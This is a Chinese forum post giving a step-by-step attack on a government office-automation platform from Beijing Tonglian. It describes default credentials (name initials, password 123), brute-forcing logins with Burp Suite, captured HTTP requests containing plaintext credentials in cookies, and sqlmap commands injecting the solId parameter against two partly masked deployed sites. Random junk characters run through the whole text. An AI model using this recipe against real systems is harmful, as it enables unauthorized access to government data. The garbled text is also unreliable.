|
# `' P, h6 D6 ~! P
W! b/ j$ s. y1 N( f. S7 h" `
' L) v' l y3 E" t4 L
0 q0 c8 s& d" E! Y, C5 O 平台简介:, }' l u- e% c
5 H; x- |9 t" l7 P; R: G# Y
+ G* H& ~6 J1 S! G4 J2 l
, }: H* S( @3 |( W' d7 ^ 2 }( O% f p2 h) S7 E) s
7 Y5 Y$ }+ y- p5 J7 i
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
+ w m+ g% j5 Y" m x同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) o! E" q- D5 `1 D- R& M, o
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
! p) P: o0 P, w ' k o7 j# |5 \" [0 I
7 `/ h" n% P5 R. Y# }' c
9 d) F4 m* _, W( M+ J# U
$ j: g6 `- }2 M$ T4 ^
3 ]& C% [' Q2 y" s3 i0 ? 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* n" ~6 L/ {0 U+ [: G0 I
~& b1 u6 K3 Q5 c2 d! p4 d+ k* w; o
4 _" I# m; E$ Q5 E* d5 V
1 `) |9 I6 b8 X+ _1 p$ I0 g
: @2 V) I; J5 _$ O$ e
http://1.1.1.1:7197/cap-aco/#(案例2-)! _# Z; ~) y6 T3 q5 O
- m; T# L. n# v1 i# K8 Q& M) Y6 G) ]& J
http://www.XXOO.com (案例1-官网网站)
8 U" N9 [1 h ]4 u- f; z1 r+ @
7 {) w' c3 @( w) R: r% _4 M+ |; e7 ?$ t& y$ Q9 O; P7 J* X
" ], n: R! t. `7 M# Z
) p( F8 k* I/ B
1 { p: T& y3 j( U 漏洞详情:. m5 O8 z: c) @) @ P) k
& O2 ?1 H) L4 b9 ]6 [! E. Y1 g+ K) I$ P& w0 Q
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
: |) J$ S; N; P+ D) @ 0 c4 C+ A3 b: b& C
) _( U+ t# R5 q( ?# B4 @4 y 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
1 |4 |0 S* J( N. Y
# [2 d& A& O! i7 z m" Q
c- Y# @2 o5 B 0 f" l1 c+ B0 j- _# G; T
: s8 W6 `$ U0 }" H5 [/ z* R/ @" }1 I9 O0 t9 b9 c; q! J0 Q: v
+ o6 w0 Z% o/ [
. \% k( D1 w! P( y, D1 Y9 K$ K7 Y% s: s! x
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:9 K2 j2 M5 S+ O0 H1 I; O7 p* y
' g9 S1 K5 x# y- J" t7 I C f
" y. j6 j+ E' \2 D8 D: T3 W/ V Y
1、案例1-官方网站
% ~. v" W5 g5 m; U8 F; d- F5 D* J4 d : [2 E0 L/ K2 ^& \4 P
3 `3 H- U! b/ ~! j* s1 D% x* K) F
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
3 u0 k2 b% \9 {& C' a1 k/ `' ] 8 q; c! |! h$ C; P3 \
3 H* r* \. e# J5 x8 O8 I+ w- M- N
Host: www.XXOO.com
( j7 e3 C& Q/ E' C5 @ y s" E7 H6 S $ i+ h; Q) ^! |% @0 U% T
1 X9 b' m2 ?! t" C; c4 W0 q3 z
Proxy-Connection: Keep-Alive6 R9 F" J1 B! F4 F! {' n a% _
9 p4 p9 K) w1 V& s3 Q
5 B: M' b9 V) O- h) J2 l9 l8 y Accept: application/json, text/javascript, */*; q=0.019 V9 y+ W) k3 u! a: B) y8 m
" T/ F7 c( `4 I" u/ F; B. d3 L. @$ x& h
Accept-Language: zh-CN
1 r$ Z* q3 Z0 n9 z/ C% C! s
1 @' @* V. y W! d
5 L% F+ h# b/ {& ~- s6 \ Content-Type: application/json$ O( T9 t2 ~ g4 W
. H& e+ {0 X/ y7 O
* U- G. H4 R* T v; }& I2 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
4 U( \ P; R- ?
, V4 @: ?+ m7 M+ W
5 Y6 O7 }# L) Q% ^$ m X-Requested-With: XMLHttpRequest
) g. f |* p7 q/ D$ Z1 o + H8 m% A$ X s) \+ [3 p
1 s9 h& ~) ]! p8 x0 v4 {# a
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
1 ~; v$ \7 X6 K3 C( h. I W- C
' F" Q9 ~; i8 H7 ^( w' o' o) M% ?- t4 @6 G7 I/ C0 T
Accept-Encoding: gzip, deflate, sdch
* N3 J2 m( }, O+ _# p! L- T * ?9 F7 P5 l F: R, R
! K8 j1 o5 P- V: J Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
- b0 F" k+ y1 ^6 b7 ~3 V; N$ y8 g , O7 G7 J/ t; g# z
0 A m f! _4 j 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 x2 [$ r" w: _& }
' b1 P) g$ c8 y: q, H
0 e- j# q! M0 n$ k! F; o1 i3 k
 # \; K. e, G5 e# l+ Z s* b% \
}3 ~: ?: q/ c0 m. U4 v8 i% w; x. z! c; F2 Y% L. c/ D
* w2 `% q7 r! w" E8 N7 x0 ^ " c% c% w3 u: a6 r Y
" F) J2 E \' N9 p3 B5 Q# r) X3 r
/ V/ H0 B+ G. O. v
% B9 B7 L! h' H0 b% D. Y
/ z" E/ E3 i0 r! F 7 k! [7 |# v/ y3 e' J. O
" b) N- x0 h! Z' W4 W% X8 C7 w
2 L4 |: L$ ?3 I
E" N8 a9 t7 _4 ~ ; N) j" [- B4 _& q. c3 t
w6 u$ a$ D. O& B/ _
2、案例2-某天河云平台
0 J. ]7 {: Q2 D% i 3 S& U7 l1 G$ _" z1 c
4 i5 @. u- o4 Y; t4 N4 J P GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1. o/ `/ s- `/ p0 ~$ F% Y4 `' P% d
8 U; c( S+ ^: E4 ^; U3 H; n! D U0 ?$ C/ w
Host: 1.1.1.:7197
6 v7 D- @) M, l" p
) ]1 H, [4 u$ m5 ^
# I# f R$ ?6 j8 z1 a0 s Accept: application/json, text/javascript, */*; q=0.01
3 B5 j, b7 u" Q4 O
/ n: k1 {" d. O6 S9 N* M `- c9 L1 z) {2 T6 `
X-Requested-With: XMLHttpRequest
( ^/ O, m0 s# X; X- d6 ~, J( E
( H$ E+ q" r a; U! k
0 }* [+ M) }$ H. j User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
% p! e1 N. m+ o" G6 D , K' }& ] _4 e, k6 o$ f9 h* O
4 S: h9 L6 x2 {: W; N( A; x
Content-Type: application/json
! v! `4 W/ c! G9 q2 \% D
( H* A0 G, @' Q, [1 h& u4 W' M. M4 u0 x9 o' Y: v* k
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
' B( V' U% F G3 n3 \
" T1 y' J" b' s: w9 b& q$ O& U
1 L A5 f0 ^8 p% C& F6 r, ] Accept-Language: zh-CN,zh;q=0.86 G, }' i: B& B* @
+ Y, F6 E4 r/ A, A- \7 y% ]
0 i, v7 m6 \' H9 _. Q Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=15 d( |& M4 m& b7 X/ {
6 J0 [5 ], A) s' q# K( |
5 S% y: H. d# l/ N( x" r: i Connection: close
! y2 i' J, }; z
# g# I* |3 }) h# r3 m- t; l3 y& R7 T. X0 K' {* J9 D; x7 B
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:/ \7 `+ g0 x, }, j7 c& G
1 G7 ^ g- g' c& Z
. j) Q" i$ S8 w, M3 I W7 O: C
1 \0 K* g1 _5 {
1 h# c. K, y3 [& E! \4 u; F. m$ y
, _ C1 N3 r& U | 
发表于 2018-10-20 20:15:17
收藏
支持
反对